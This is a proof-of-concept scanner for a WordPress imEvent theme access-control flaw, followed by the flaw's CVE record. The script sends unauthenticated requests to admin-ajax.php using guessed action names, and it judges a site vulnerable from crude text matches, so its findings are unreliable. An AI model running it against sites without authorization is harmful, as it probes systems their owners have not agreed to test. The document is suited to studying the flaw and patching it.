CVE-2025-58243

# CVE-2025-58243 PoC - WordPress imEvent Theme Broken Access Control # Affected: Jthemes imEvent Theme <= 3.4.0 # Vulnerability: Missing Authorization in imEvent functionality import requests import sys from urllib.parse import urljoin def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-58243 """ print(f"[*] Testing target: {target_url}") # Common imEvent AJAX endpoints vulnerable_endpoints = [ 'wp-admin/admin-ajax.php', 'wp-admin/admin.php', ] # Common imEvent actions that might be vulnerable # Note: Actual action names need to be identified from theme code test_actions = [ 'imevent_get_events', 'imevent_export_data', 'imevent_manage_bookings', 'imevent_get_attendees', ] results = [] for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) for action in test_actions: # Test without authentication data = { 'action': action, 'security': 'test' } try: response = requests.post(full_url, data=data, timeout=10, verify=False) # Check for successful unauthorized access # Response codes: 200 with data = potentially vulnerable if response.status_code == 200: # Check if response contains sensitive data if 'success' in response.text or 'data' in response.text: result = { 'endpoint': full_url, 'action': action, 'status': 'POTENTIALLY_VULNERABLE', 'response_code': response.status_code } results.append(result) print(f"[!] Potentially vulnerable endpoint found: {full_url} with action {action}") except requests.RequestException as e: print(f"[-] Error testing {full_url}: {str(e)}") return results def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-58243-poc.py <target_url>") print("Example: python cve-2025-58243-poc.py http://example.com") sys.exit(1) target = sys.argv[1] results = check_vulnerability(target) if results: print(f"\n[+] Found {len(results)} potentially vulnerable endpoints") else: print("\n[-] No obvious vulnerabilities detected (manual verification recommended)") if __name__ == '__main__': main() # Additional manual testing steps: # 1. Identify the exact imEvent theme version # 2. Analyze theme files for AJAX hooks and callback functions # 3. Test each callback function for proper capability checks # 4. Verify using: current_user_can('manage_options') in theme code # 5. Check for missing auth callbacks in add_action('wp_ajax_*', ...) calls

{"cve": {"id": "CVE-2025-58243", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:58.723", "lastModified": "2026-04-27T19:16:14.603", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Jthemes imEvent imevent allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects imEvent: from n/a through <= 3.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/imevent/vulnerability/wordpress-imevent-theme-3-4-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}